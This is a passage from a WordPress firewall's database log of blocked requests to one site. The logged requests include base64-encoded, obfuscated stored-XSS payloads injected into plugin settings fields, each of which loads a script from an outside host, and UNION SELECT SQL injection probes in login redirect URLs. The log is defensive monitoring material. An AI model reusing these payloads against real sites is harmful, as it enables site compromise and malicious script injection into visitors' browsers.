',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8109,1564715966.751550,1564715965.991800,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8050,1564682681.857031,1564682680.939000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfaGVhZGxpbmVd\",\"paramValue\":\"PHNjcmlwdCBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(8051,1564682679.953531,1564682677.635600,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0IGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8110,1564715964.112594,1564715963.722200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8052,1564682674.789541,1564682669.198000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(8111,1564715962.264204,1564715961.802000,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8053,1564682666.829678,1564682660.912300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8112,1564715960.585712,1564715960.106200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8054,1564682659.766747,1564682657.146800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8055,1564682654.904493,1564682653.988100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8113,1564715958.388489,1564715957.946600,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8056,1564682650.864068,1564682649.260500,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpi